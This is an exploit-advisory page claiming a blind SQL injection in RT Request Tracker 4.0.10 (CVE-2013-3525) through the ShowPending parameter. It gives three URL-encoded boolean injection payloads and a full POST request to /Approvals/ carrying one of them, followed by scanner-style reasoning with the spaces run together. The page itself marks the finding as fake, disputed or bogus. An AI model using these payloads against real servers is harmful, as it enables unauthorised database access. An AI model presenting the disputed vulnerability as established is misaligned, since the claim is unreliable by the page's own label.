RT: Request Tracker 4.0.10 SQL Injection

WARNING! Fake news / Disputed / BOGUS

RT: Request Tracker 4.0.10 SQL Injection

2013-04-11 / 2013-12-23

Credit: cheki

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2013-3525

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux

############################################
URL: http://10.10.10.70/Approvals/
Entity: ShowPending(Parameter)
Risk: Itispossibletoview,modifyordeletedatabaseentriesandtables
Causes: Sanitationofhazardouscharacterswasnotperformedcorrectlyonuserinput
Fix: Reviewpossiblesolutionsforhazardouscharacterinjection

#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes
and commenting out the rest of the query.
#The following changes were applied the original request
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+' 
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--' 
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--' 


POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

###############################################
Reasoning: Thetestresultseemstoindicateavulnerabilitybecauseitshowsthatvalues
canbeappendedtoparametervalues, indicatingthattheywereembeddedinanSQLquery.HEX(0D)HEX(0A)In
thistest,three(orsometimesfour)requestsare sent.Thelastislogicallyequaltotheoriginal,andthe
nexttolastisdifferent.Anyothersareforcontrolpurposes.A comparisonofthelasttworesponseswith
thefirst(thelastissimilartoit,andthenexttolastisdifferent)indicatesthat theapplicationisvulnerable.


Home Page: securitylabnews.blogspot.com

References:

http://bestpractical.com/rt/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

RT: Request Tracker 4.0.10 SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.